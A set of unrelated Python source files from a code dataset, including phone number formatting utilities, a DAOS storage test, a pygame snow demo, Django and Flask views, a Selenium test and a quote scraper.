naked e164, even if it is prefixed with: +/011/00\n\n Examples:\n\n assert e164_split('12036660420') == ('1', '2036660420')\n assert e164_split('+12036660420') == ('1', '2036660420')\n assert e164_split('01144123456789') == ('44', '123456789')\n assert e164_split('44123456789') == ('44', '123456789')\n\n \"\"\"\n if not phoneno:\n return (None, None)\n if phoneno.startswith(\"+\"):\n phoneno = phoneno[1:]\n phoneno = re.sub(r\"\\D\", \"\", phoneno)\n if len(phoneno) < 5:\n return (None, None)\n if phoneno.startswith('011'):\n phoneno = phoneno[3:]\n if phoneno.startswith('00'):\n phoneno = phoneno[2:]\n if len(phoneno) < 5 or phoneno[0] == '0':\n return (None, None)\n if int(phoneno[0]) in (1, 7): # 1st and 2nd world\n return (phoneno[0], phoneno[1:])\n if int(phoneno[:2]) in ( # all 2 digit country dialing codes\n 20, 27, 30, 31, 32, 33, 34, 36, 39, 40, 41, 43, 44, 45, 46, 47, 48,\n 49, 51, 52, 53, 54, 55, 56, 57, 58, 60, 61, 62, 63, 64, 65, 66, 81,\n 82, 84, 86, 90, 91, 92, 93, 94, 95, 98):\n return (phoneno[:2], phoneno[2:])\n else:\n return (phoneno[:3], phoneno[3:])\n\ndef e164_format(phoneno, country=None, text_names=True):\n \"\"\"\n If the number doesn't appear sane, this function will spit it back\n as is. If the number is for a country we don't know about, we\n shuold show the number in i18n format with a + prefix and country\n code.\n\n Country is the country code for the user. When formatting numbers\n for this user's country we will exclude the country code. We only\n take out the country code when we have a really good grasp on the\n formatting for a particular country.\n \"\"\"\n phoneno = i_said_ascii_god_damnit(phoneno)\n if not phoneno:\n return u'Unavailable'\n if text_names and phoneno.strip().lower() in ('', 'unavailable', 'unknown'):\n return u'Unavailable'\n if text_names and phoneno.strip().lower() in ('anonymous', 'withheld', 'private'):\n return u'Anonymous'\n\n (cc, number) = e164_split(phoneno)\n if not cc or not number:\n return phoneno\n res = None\n trunk = None\n include_cc = True\n\n if cc == '1': # NANP: +1 (203) 666-1234 or 203-666-1234\n if country and country in NANP_COUNTRIES:\n include_cc = False\n m = NANP_NUMBER.search(number)\n if m: res = \"%s-%s-%s\" % (m.group('npa'), m.group('nxx'), m.group('station'))\n elif cc == '44': # UK: http://en.wikipedia.org/wiki/Telephone_numbers_in_the_United_Kingdom\n if country and country == 'GB':\n include_cc = False\n m = re.search(\"^(?P<area>1\\d1|11\\d|8\\d\\d)(?P<area2>\\d{3})(?P<station>\\d+)$\", number)\n if m:\n res = \"%s %s %s\" % (m.group('area'), m.group('area2'), m.group('station'))\n else:\n m = re.search(\"^(?P<area>[17]\\d\\d\\d)(?P<station>\\d+)$\", number)\n if m: res = \"%s %s\" % (m.group('area'), m.group('station'))\n m = re.search(\"^(?P<area>[235]\\d)(?P<area2>\\d{4})(?P<station>\\d+)$\", number)\n if m: res = \"%s %s %s\" % (m.group('area'), m.group('area2'), m.group('station'))\n if res:\n trunk = '0'\n elif cc == '33': # France: +33 09 12 34 56 78\n if country and country == 'FR':\n include_cc = False\n if len(number) == 9 and number[0] != '0':\n trunk = '0'\n res = \"%s %s %s %s %s\" % (number[0], number[1:3], number[3:5], number[5:7], number[7:9])\n\n if res is None:\n return \"+%s %s\" % (cc, number)\n if include_cc:\n if trunk is not None:\n res = \"(%s)%s\" % (trunk, res)\n return \"+%s %s\" % (cc, res)\n else:\n if trunk is not None:\n return \"%s%s\" % (trunk, res)\n else:\n return res\n\ndef parse_pstn_number(phoneno, country=None):\n \"\"\"Returns a naked e164 number or raises hell\"\"\"\n if not phoneno:\n raise InvalidPSTNNumber(phoneno)\n phoneno = i_said_ascii_god_damnit(phoneno)\n phoneno = re.sub(r\"[^+0-9]\", \"\", phoneno)\n if len(phoneno) > 32:\n raise InvalidPSTNNumber(phoneno)\n if phoneno.startswith('+1'):\n phoneno = phoneno[1:]\n if phoneno.startswith('+'):\n phoneno = '011' + phoneno[1:]\n if '+' in phoneno:\n raise InvalidPSTNNumber(phoneno)\n if phoneno.startswith('011') or phoneno.startswith('00'):\n # International, or is it?\n if phoneno.startswith('001'):\n phoneno = phoneno[2:]\n elif phoneno.startswith('0111'):\n phoneno = phoneno[3:]\n else:\n (cdp, no) = e164_split(phoneno)\n if cdp is not None and len(no) >= 5:\n if no[0] == '0': # they left in the trunk prefix *sigh*\n if cdp != '39': # italy is a weird exception\n no = no[1:]\n return \"%s%s\" % (cdp, no)\n if phoneno.startswith('1') and re.search(\"^1[2-9]\\d\\d[2-9]\\d{6}$\", phoneno):\n return phoneno\n if phoneno.startswith('0') and country:\n # non-nanp natl dialing\n cdp = prefix_for_country(country)\n if cdp != '1' and len(phoneno[1:]) >= 5:\n if cdp == '39': # italy keeps trunk prefix\n return '%s%s' % (cdp, phoneno)\n else:\n return '%s%s' % (cdp, phoneno[1:])\n if country and country in NANP_COUNTRIES and re.search(\"^[2-9]\\d\\d[2-9]\\d{6}$\", phoneno):\n # nanp natl dialing w/o 1\n return \"1%s\" % (phoneno)\n raise InvalidPSTNNumber(phoneno)\n\ndef parse_caller_id(cid, country=None):\n try:\n return parse_pstn_number(cid, country)\n except InvalidPSTNNumber:\n return ''\n\ndef country_in_nanp(country):\n assert len(country) == 2\n assert country == country.upper()\n return country.upper() in NANP_COUNTRIES\n\ndef cdp(phoneno):\n (cdp, number) = e164_split(phoneno)\n return cdp\n\ndef npa(phoneno):\n \"\"\"10 digit numbers only\"\"\"\n return phoneno[0:3]\n\ndef nxx(phoneno):\n \"\"\"10 digit numbers only\"\"\"\n return phoneno[3:6]\n\ndef is_toll_free(phoneno):\n \"\"\"Only supports NANP for now\"\"\"\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and npa(number) in TOLL_FREE_NPA)\n\ndef is_premium_rate(phoneno):\n \"\"\"Only supports NANP for now\"\"\"\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and bool(re.search(IS_PREMIUM_RATE, cdp + number)))\n\ndef is_canadian(phoneno):\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and npa(number) in CANADIAN_NPA)\n\ndef is_dominican_republic(phoneno):\n (cdp, number) = e164_split(phoneno)\n return (cdp == '1' and npa(number) in DOMINICAN_REPUBLIC_NPA)\n\ndef prefix_for_country(country, default=None):\n return COUNTRY_DIALING_PREFIX.get(country, default)\n\ndef e164_to_nanp(phoneno):\n if not phoneno:\n return phoneno\n phoneno = phoneno.lstrip('+')\n if phoneno.startswith('1'):\n return phoneno\n else:\n return '011' + phoneno\n\ndef add_plus(phoneno):\n if not phoneno:\n return phoneno\n return '+' + phoneno.lstrip('+')\n","sub_path":"django_extensions/l10n/phonenumber.py","file_name":"phonenumber.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"267246826","text":"#!/usr/bin/python\n'''\n (C) Copyright 2018-2019 Intel Corporation.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE\n The Government's rights to use, modify, reproduce, release, perform, display,\n or disclose this software are subject to the terms of the Apache License as\n provided in Contract No. B609815.\n Any reproduction of computer software, computer software documentation, or\n portions thereof marked with this legend must also reproduce the markings.\n'''\nfrom __future__ import print_function\n\nimport os\nimport json\n\nfrom apricot import Test\n\nimport agent_utils\nimport server_utils\nimport write_host_file\nimport ior_utils\nfrom daos_api import DaosContext, DaosPool, DaosApiError\n\nclass IorSingleServer(Test):\n \"\"\"\n Tests IOR with Single Server config.\n :avocado: recursive\n \"\"\"\n def setUp(self):\n # get paths from the build_vars generated by build\n with open('../../../.build_vars.json') as build_file:\n build_paths = json.load(build_file)\n self.basepath = os.path.normpath(build_paths['PREFIX'] + \"/../\")\n\n self.server_group = self.params.get(\"name\", '/server_config/',\n 'daos_server')\n self.daosctl = self.basepath + '/install/bin/daosctl'\n\n # setup the DAOS python API\n self.context = DaosContext(build_paths['PREFIX'] + '/lib/')\n self.pool = None\n\n self.hostlist_servers = self.params.get(\"test_servers\",\n '/run/hosts/test_machines/*')\n self.hostfile_servers = (\n write_host_file.write_host_file(self.hostlist_servers,\n self.workdir))\n print(\"Host file servers is: {}\".format(self.hostfile_servers))\n\n self.hostlist_clients = self.params.get(\"test_clients\",\n '/run/hosts/test_machines/*')\n self.hostfile_clients = (\n write_host_file.write_host_file(self.hostlist_clients,\n self.workdir, None))\n print(\"Host file clientsis: {}\".format(self.hostfile_clients))\n\n # set ior_flags and object class to be used by test\n self.ior_flags = self.params.get(\"F\", '/run/ior/iorflags/')\n self.object_class = self.params.get(\"o\", '/run/ior/objectclass/')\n\n self.agent_sessions = agent_utils.run_agent(self.basepath,\n self.hostlist_servers,\n self.hostlist_clients)\n server_utils.run_server(self.hostfile_servers, self.server_group,\n self.basepath)\n\n def tearDown(self):\n try:\n if self.hostfile_clients is not None:\n os.remove(self.hostfile_clients)\n if self.hostfile_servers is not None:\n os.remove(self.hostfile_servers)\n if self.pool is not None and self.pool.attached:\n self.pool.destroy(1)\n finally:\n if self.agent_sessions:\n agent_utils.stop_agent(self.agent_sessions,\n self.hostlist_clients)\n server_utils.stop_server(hosts=self.hostlist_servers)\n\n def test_singleserver(self):\n \"\"\"\n Test IOR with Single Server config.\n\n :avocado: tags=ior,singleserver\n \"\"\"\n\n # parameters used in pool create\n createmode = self.params.get(\"mode\", '/run/createtests/createmode/*/')\n createuid = os.geteuid()\n creategid = os.getegid()\n createsetid = self.params.get(\"setname\", '/run/createtests/createset/')\n createsize = self.params.get(\"size\", '/run/createtests/createsize/')\n createsvc = self.params.get(\"svcn\", '/run/createtests/createsvc/')\n\n # ior parameters\n client_processes = self.params.get(\"np\", '/run/ior/client_processes/*/')\n iteration = self.params.get(\"iter\", '/run/ior/iteration/')\n transfer_size = self.params.get(\"t\",\n '/run/ior/transfersize_blocksize/*/')\n block_size = self.params.get(\"b\", '/run/ior/transfersize_blocksize/*/')\n\n try:\n # initialize a python pool object then create the underlying\n # daos storage\n self.pool = DaosPool(self.context)\n self.pool.create(createmode, createuid, creategid,\n createsize, createsetid, None, None, createsvc)\n pool_uuid = self.pool.get_uuid_str()\n print (\"pool_uuid: {}\".format(pool_uuid))\n tmp_rank_list = []\n svc_list = \"\"\n for item in range(createsvc):\n tmp_rank_list.append(int(self.pool.svc.rl_ranks[item]))\n svc_list += str(tmp_rank_list[item]) + \":\"\n svc_list = svc_list[:-1]\n\n ior_utils.run_ior_daos(self.hostfile_clients, self.ior_flags,\n iteration, block_size, transfer_size,\n pool_uuid, svc_list, self.object_class,\n self.basepath, client_processes)\n\n except (DaosApiError, ior_utils.IorFailed) as excep:\n self.fail(\"<Single Server Test FAILED>\\n {}\".format(excep))\n","sub_path":"src/tests/ftest/io/ior_single_server.py","file_name":"ior_single_server.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"596136723","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\nclass coor:\n def __init__(self,x_coor=[0,10,0,0,10,10,0,10],y_coor = [0,0,10,0,10,0,10,10], z_coor = [0,0,0,10,0,10,10,10],persp_ref_pt = [0,0,-30], z_v = 100):\n self.x_co = x_coor.copy()\n self.y_co = y_coor.copy()\n self.z_co = z_coor.copy()\n self.persp_ref = persp_ref_pt\n self.z_vp = z_v\n \n def modeling_to_perspective(self):\n x_co_p = []\n y_co_p = []\n persp_refa = [0,0,-30]\n for i in zip(self.x_co,self.y_co,self.z_co):\n print(i)\n a = i[0]*(persp_refa[2]-self.z_vp)/(persp_refa[2]-i[2])+persp_refa[0]*(self.z_vp - i[2])/(persp_refa[2]-i[2])\n b = i[1]*(persp_refa[2]-self.z_vp)/(persp_refa[2]-i[2])+persp_refa[1]*(self.z_vp - i[2])/(persp_refa[2]-i[2])\n x_co_p.append(a)\n y_co_p.append(b)\n return (x_co_p, y_co_p)\n\na = coor()\na.modeling_to_perspective()\nplt.show()","sub_path":"Source COde/3Dstuff.py","file_name":"3Dstuff.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"102354750","text":"import pygame\nimport sys\nimport random\n\npygame.init()\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\ngreen = (0, 255, 0)\nred = (255, 0, 0)\nblue = (0, 0, 255)\n\nSCREEN_WIDTH = 700\nSCREEN_HEIGHT = 500\nSCREEN_TOP = int(SCREEN_HEIGHT - SCREEN_HEIGHT + SCREEN_HEIGHT / 20)\nSCREEN_BOTTOM = int(SCREEN_HEIGHT)\nwindow_size = (SCREEN_WIDTH, SCREEN_HEIGHT)\n\nscreen = pygame.display.set_mode(window_size)\npygame.display.set_caption(\"Sain's World\")\n\nrunning = True\n\nclock = pygame.time.Clock()\n\nfont = pygame.font.Font(None, 25)\ntext = font.render(\"Sain's World\", True, white)\ntext_rect = text.get_rect(center=(SCREEN_WIDTH/2, SCREEN_TOP))\n\nkeys = pygame.key.get_pressed()\nmove_ticker = 0\n\nplayerX = 50\nplayerY = 50\n\nmax_snow = 100\nsnow_list = []\n\nfor i in range(max_snow):\n snowX = random.randrange(0, SCREEN_WIDTH)\n snowY = random.randrange(0, SCREEN_HEIGHT)\n snow_list.append([snowX, snowY])\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n playerX -= 1\n if event.key == pygame.K_RIGHT:\n playerX += 1\n if event.key == pygame.K_DOWN:\n playerY += 1\n if event.key == pygame.K_UP:\n playerY -= 1\n\n screen.fill(black)\n\n screen.blit(text, text_rect)\n\n # player test character\n pygame.draw.rect(screen, green, [playerX, playerY, 50, 50])\n\n for i in range(len(snow_list)):\n mouse_pos = pygame.mouse.get_pos()\n mouse_x = mouse_pos[0]\n mouse_y = mouse_pos[1]\n\n pygame.draw.circle(screen, white, snow_list[i], 5)\n snow_list[i][1] += 1\n\n if snow_list[i][1] > SCREEN_HEIGHT:\n y = SCREEN_TOP\n x = random.randrange(0, SCREEN_WIDTH)\n snow_list[i][1] = y\n snow_list[i][0] = x\n if mouse_x == snow_list[i][0] and mouse_y == snow_list[i][1]:\n y = SCREEN_TOP\n x = random.randrange(0, SCREEN_WIDTH)\n snow_list[i][1] = y\n snow_list[i][0] = x\n\n pygame.display.flip()\n\n clock.tick(60)\n\npygame.quit()\n\n\"\"\"\"\nclass GameObject:\n def __init__(self, image, height, speed):\n self.speed = speed\n self.image = image\n self.pos = image.get_rect().move(0, height)\n\n def move(self):\n self.pos = self.pos.move(0, self.speed)\n if self.pos.right > 600:\n self.pos.left = 0\n\nscreen = pygame.display.set_mode((640, 480))\nplayer_visible = pygame.image.load('player.bmp').convert()\nbackground = pygame.image.load('background.bmp').convert()\nscreen.blit(background, (0, 0))\nobjects = []\n\nfor x in range(10):\n o = GameObject(player_visible, x*40, x)\n objects.append(o)\nwhile 1:\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n sys.exit()\n for o in objects:\n screen.blit(background, o.pos, o.pos)\n for o in objects:\n o.move()\n\n pygame.display.update()\n pygame.time.delay(100)\n\"\"\"\n","sub_path":"unused/gameWindow.py","file_name":"gameWindow.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"116604614","text":"\"\"\"\nVariable module.\n\"\"\"\n\nimport os\n\nimport requests\n\nimport cwt\n\n__all__ = ['Variable']\n\nclass Variable(cwt.Parameter):\n \"\"\" Variable.\n \n Describes a variable to be used by an Operation.\n\n >>> tas = Variable('http://thredds/tas.nc', 'tas', name='tas')\n\n Attributes:\n uri: A String URI for the file containing the variable data.\n var_name: A String name of the variable.\n domains: List of cwt.Domain objects to constrain the variable data.\n mime_type: A String name of the URI mime-type.\n name: Custom name of the Variable.\n \"\"\"\n def __init__(self, uri, var_name, **kwargs):\n \"\"\" Variable init. \"\"\"\n super(Variable, self).__init__(kwargs.get('name', None))\n\n self.uri = uri\n self.var_name = var_name\n\n domains = kwargs.get('domains', None)\n\n if domains and isinstance(domains, cwt.Domain):\n domains = [domains]\n\n self.domains = domains\n self.mime_type = kwargs.get('mime_type', None)\n\n @classmethod\n def from_dict(cls, data):\n \"\"\" Create variable from dict representation. \"\"\"\n uri = None\n\n if 'uri' in data:\n uri = data['uri']\n else:\n raise cwt.ParameterError('Variable must provide a uri.')\n\n name = None\n var_name = None\n\n if 'id' in data:\n if '|' in data['id']:\n var_name, name = data['id'].split('|')\n else:\n raise cwt.ParameterError('Variable id must contain a variable name and id.')\n else:\n raise cwt.ParameterError('Variable must provide an id.')\n\n domains = None\n\n if 'domain' in data:\n domains = data['domain']\n\n if not isinstance(domains, (list, tuple)):\n domains = [domains]\n\n mime_type = None\n\n if 'mime_type' in data:\n mime_type = data['mime_type']\n\n return cls(uri, var_name, domains=domains, name=name, mime_type=mime_type)\n\n def resolve_domains(self, domains):\n \"\"\" Resolves the domain identifiers to objects. \"\"\"\n\n if self.domains is None:\n return\n \n new_domains = []\n\n for d in self.domains:\n if d not in domains:\n raise Exception('Could not find domain {}'.format(d))\n\n new_domains.append(domains[d])\n\n self.domains = new_domains\n\n def localize(self, filename=None):\n if filename is None:\n filename = 'output.nc'\n\n try:\n response = requests.get(self.uri)\n except requests.ConnectionError:\n raise Exception('Failed to localize file.')\n\n path = os.path.join(os.getcwd(), filename)\n\n with open(path, 'w') as f:\n for chunk in response.iter_content(512000):\n f.write(chunk)\n\n return path\n\n def parameterize(self):\n \"\"\" Parameterize variable for GET request. \"\"\"\n params = {\n 'uri': self.uri,\n 'id': self.var_name,\n }\n\n if self.domains:\n params['domain'] = '|'.join(dom.name for dom in self.domains)\n\n if self.var_name:\n params['id'] += '|' + str(self.name)\n\n if self.mime_type:\n params['mime_type'] = self.mime_type\n\n return params\n\n def __repr__(self):\n return ('Variable(name=%r, uri=%r, var_name=%r, domains=%r, '\n 'mime_type=%r)' % (self.name, self.uri, self.var_name,\n self.domains, self.mime_type))\n","sub_path":"cwt/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"430919371","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import RegistrationForm, UserUpdate,ProfileUpdate\nfrom django.contrib.auth.decorators import login_required\n\ndef register(request):\n\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request,f'congratulations {username}. your account has been created!you are now able to login')\n return redirect('login')\n else:\n\n form = RegistrationForm()\n\n return render(request,'register.html',{'form':form})\n\n@login_required\ndef profile(request):\n\n return render(request,'profile.html')\n\n\n\ndef profile_update(request):\n if request.method == 'POST':\n u_form = UserUpdate(request.POST,instance=request.user)\n p_form = ProfileUpdate(request.POST,request.FILES,instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request,f'your account has been updated successfully!')\n return redirect('profile')\n\n else:\n u_form = UserUpdate(instance=request.user)\n p_form = ProfileUpdate(instance=request.user.profile)\n context = {\n 'u_form':u_form,\n 'p_form':p_form\n }\n\n return render(request,'profile_update.html',context)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"271541669","text":"#! /usr/bin/python3 \n# coding:utf-8\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom django.test import LiveServerTestCase\n\nclass NewVisitorTest(LiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome()\n self.browser.implicitly_wait(3)\n \n def tearDown(self):\n self.browser.quit()\n \n def check_row_in_table(self,row_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text,[row.text for row in rows])\n \n def test_cat_start_list_and_retrieve_it_later(self):\n self.browser.get(self.live_server_url)\n self.assertIn('To-Do',self.browser.title)\n\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do',header_text)\n\n inputbox = self.browser.find_element_by_id('id_new_item')\n self.assertEqual(\n inputbox.get_attribute('placeholder'),\n 'Enter a new item'\n )\n\n inputbox.send_keys('Buy a fish food')\n inputbox.send_keys(Keys.ENTER)\n \n edith_list_url = self.browser.current_url\n\n self.assertRegex(edith_list_url,'/lists/.+')\n self.check_row_in_table('1: Buy a fish food')\n\n\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('Use fish food to fly')\n inputbox.send_keys(Keys.ENTER)\n\n self.check_row_in_table('1: Buy a fish food')\n self.check_row_in_table('2: Use fish food to fly')\n\n self.browser.quit()\n self.browser = webdriver.Chrome()\n \n self.browser.get(self.live_server_url)\n page_text = self.browser.find_element_by_tag_name('body').text\n \n self.assertNotIn('Buy a fish food',page_text)\n self.assertNotIn('Use fish food to fly',page_text)\n\n inputbox = self.browser .find_element_by_id('id_new_item')\n inputbox.send_keys('Buy milk')\n inputbox.send_keys(Keys.ENTER)\n\n francis_list_url = self.browser.current_url\n self.assertRegex(francis_list_url,'/lists/.+')\n self.assertNotEqual(edith_list_url,francis_list_url)\n\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy a fish food',page_text)\n self.asserttIn('Buy milk',page_text)\n\n\n self.fail('Finish functional!')\n \n\n","sub_path":"functional/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"412652900","text":"\n# ======================================================\n# @Author : Daniel                 \n# @Time : 2020.6.20\n# @Desc : 用户视图\n# ======================================================\n\nfrom flask import request, render_template, redirect, url_for\nfrom utils.check_login import is_login\nfrom .models import Grade, Student\nfrom .user_views import user_bp\n\n\n@user_bp.route('/grade/', methods=['GET'])\n@is_login\ndef grade_list():\n \"\"\"\n 显示班级列表\n :return:\n \"\"\"\n if request.method == 'GET':\n # 查询第几页数据\n page = int(request.args.get('page', 1))\n # 查询每页的数据是多少,默认为10条\n page_num = int(request.args.get('page_num', 10))\n # 查询当前第几页的多少条数据\n paginate = Grade.query.order_by('g_id').paginate(page, page_num)\n # 获取某页的具体数据\n grades = paginate.items\n\n # 返回获取到的数据到前端页面\n return render_template('grade/grade_list.html', grades=grades, paginate=paginate)\n\n\n@user_bp.route('/grade_edit/', methods=['GET', 'POST'])\n@is_login\ndef edit_grade():\n \"\"\"\n 班级添加\n :return:\n \"\"\"\n if request.method == 'GET':\n g_id = request.args.get('g_id', None)\n\n if g_id:\n grade = Grade.query.get(int(g_id))\n # g_name = Grade.query.filter(Grade.g_id==g_id).first().g_name\n else:\n grade = None\n\n return render_template('grade/grade_edit.html', grade=grade)\n\n if request.method == 'POST':\n g_name = request.form['g_name']\n\n # 判断是否为编辑修改\n if 'g_id' in request.form and request.form['g_id']:\n grade = Grade.query.get(int(request.form['g_id']))\n grade.g_name = g_name\n\n else:\n\n o_grade = Grade.query.filter_by(g_name=g_name).first()\n\n # 判断要添加的信息数据库中是否存在(因为班级名称不能重复)\n if o_grade:\n msg = '班级名称不能重复!!'\n return render_template('grade/grade_edit.html', msg=msg)\n\n # 创建班级\n grade = Grade(g_name)\n\n grade.save()\n\n return redirect(url_for('user.grade_list'))\n\n\n@user_bp.route('/grade_student/', methods=['GET', 'POST'])\n@is_login\ndef grade_students_list():\n \"\"\"\n 班级学生列表\n :return:\n \"\"\"\n if request.method == 'GET':\n g_id = request.args.get('g_id')\n\n # 第几页\n page = int(request.args.get('page', 1))\n # 每页的数据\n page_num = int(request.args.get('page_num', 10))\n # 查询当前第几页的多少条数据\n paginate = Student.query.filter_by(grade_id=g_id).order_by('s_id').paginate(page, page_num)\n\n # 获取某页的具体数据\n students = paginate.items\n\n return render_template('student/student_list.html', students=students, paginate=paginate)\n\n","sub_path":"App/grade_views.py","file_name":"grade_views.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"275160150","text":"# BrainyQuote Web Scraper (By Keyword)\n# SPECIAL POMMUNISM EDITION\n# Alaina Kafkes\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom os.path import exists\nimport re\n\n# # For every page pertaining to a topic\n# for page in pageNameArray:\n# # Obtain BrainyQuote page html\n# base_url = \"http://www.brainyquote.com/quotes/keywords/\"\n# url = base_url + keyword + \".html\"\n# response_data = requests.get(url).text[:]\n# soup = BeautifulSoup(response_data, 'html.parser')\n\n# # Populate quoteArray\n# for item in soup.find_all(\"span\", class_=\"bqQuoteLink\"):\n# quoteArray.append(item.get_text().rstrip())\n\n# # Populate authorArray\n# for item in soup.find_all(\"div\", class_=\"bq-aut\"):\n# authorArray.append(item.get_text())\n\ndef main():\n url = 'https://www.brainyquote.com/quote_of_the_day'\n response_data = requests.get(url).text[:]\n if not exists('/home/jim/tmp/qod.html'):\n file = open('/home/jim/tmp/qod.html', 'w')\n file.write(response_data)\n soup = BeautifulSoup(response_data, 'html.parser')\n display = re.compile('^display:')\n view_author = re.compile('view autho:')\n # <div class=\"grid-item qb clearfix bqQt\">\n for item in soup.find_all(\"div\", class_=\"grid-item qb clearfix bqQt\"):\n # print(item)\n # <h2 class=\"qotd-h2\">Funny Quote Of the Day</h2>\n category = item.find(\"h2\",class_=\"qotd-h2\")\n if category:\n print('category: %s' % category.get_text().strip())\n # <div style=\"display: flex;justify-content: space-between\">\n quote = item.find(\"div\", { \"style\" : display })\n if quote:\n print('quote: %s' % quote.get_text().strip())\n # <a href=\"/authors/jonathan-swift-quotes\" class=\"bq-aut qa_155269 oncl_a\" title=\"view author\">Jonathan Swift</a>\n author = item.find(\"a\", {\"title\" : \"view author\"})\n if author:\n print('author: %s' % author.get_text().strip())\n\n # # Populate authorArray\n # for item in soup.find_all(\"div\", class_=\"bq-aut\"):\n # authorArray.append(item.get_text())\nif __name__ == '__main__':\n main()","sub_path":"brainscrapeqod.py","file_name":"brainscrapeqod.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"208842516","text":"# Install the addon and save the user's preferences\nimport bpy\nimport os\n\n# Get the absolute path to the addon\ndir = os.path.dirname(__file__)\naddonFilePath = dir + '/blender-mesh-to-json.py'\n\n# Install the addon, enable it and save the user's preferences so that it\n# is available whenever Blender is opened in the future\nbpy.ops.preferences.addon_install(filepath=addonFilePath)\nbpy.ops.preferences.addon_enable(module='blender-mesh-to-json')\nbpy.ops.wm.save_userpref()\n","sub_path":"install-addon.py","file_name":"install-addon.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"364674480","text":"a=int(input('Introduceti primul numar = '))\r\nb=int(input('Introduceti al doilea numar = '))\r\nif ((a%2)==0) and ((b%2)==0):\r\n if (a>b):\r\n print (a)\r\n if (a<b):\r\n print (b)\r\nif ((a%2)==0) and ((b%2)!=0):\r\n print (a)\r\nif ((b%2)==0) and ((a%2)!=0):\r\n print (b)\r\nif ((a%2)!=0) and ((b%2)!=0):\r\n print ('numere nu sunt pare')\r\n\r\n","sub_path":"Problema8.py","file_name":"Problema8.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"101650430","text":"class RGBA(object):\r\n \"\"\"Container to hoal a RGBA color\"\"\"\r\n def __init__(self, R=0, G=0, B=0, A=0):\r\n super(RGBA, self).__init__()\r\n self.R = R\r\n self.G = G\r\n self.B = B\r\n self.A = A\r\n\r\n\r\n def __eq__(self, other):\r\n return self.R == other.R \\\r\n and self.G == other.G \\\r\n and self.B == other.B \\\r\n and self.A == other.A\r\n\r\n\r\n def __repr__(self):\r\n return \"RGBA({},{},{},{})\".format(\r\n str(self.R).rjust(3),\r\n str(self.G).rjust(3),\r\n str(self.B).rjust(3),\r\n str(self.A).rjust(3))\r\n\r\n\r\ncolors = {\r\n \"red\": RGBA(255, 0, 0, 255),\r\n \"green\": RGBA(0, 255, 0, 255),\r\n \"blue\": RGBA(0, 0, 255, 255),\r\n \"black\": RGBA(0, 0, 0, 255),\r\n \"white\": RGBA(255, 255, 255, 255),\r\n \"default\": RGBA(0, 0, 0, 0),\r\n}\r\n\r\n\r\nclass Board(object):\r\n \"\"\"Represents a board that we can draw on and request data\"\"\"\r\n def __init__(self, width, height):\r\n super(Board, self).__init__()\r\n self.width = width\r\n self.height = height\r\n self.board = [[RGBA() for _ in range(width)] for _ in range(height)]\r\n\r\n\r\n def pixelAt(self, x, y):\r\n if x >= self.width:\r\n return None\r\n if y >= self.height:\r\n return None\r\n return self.board[x][y]\r\n\r\n\r\n def set(self, x, y, color):\r\n if x >= self.width:\r\n return\r\n if y >= self.height:\r\n return\r\n self.board[x][y] = color\r\n\r\n\r\n def reset(self):\r\n for x in range(self.width):\r\n for y in range(self.height):\r\n self.board[x][y] = colors[\"default\"]\r\n\r\n\r\n def paint(self, color):\r\n for x in range(self.width):\r\n for y in range(self.height):\r\n 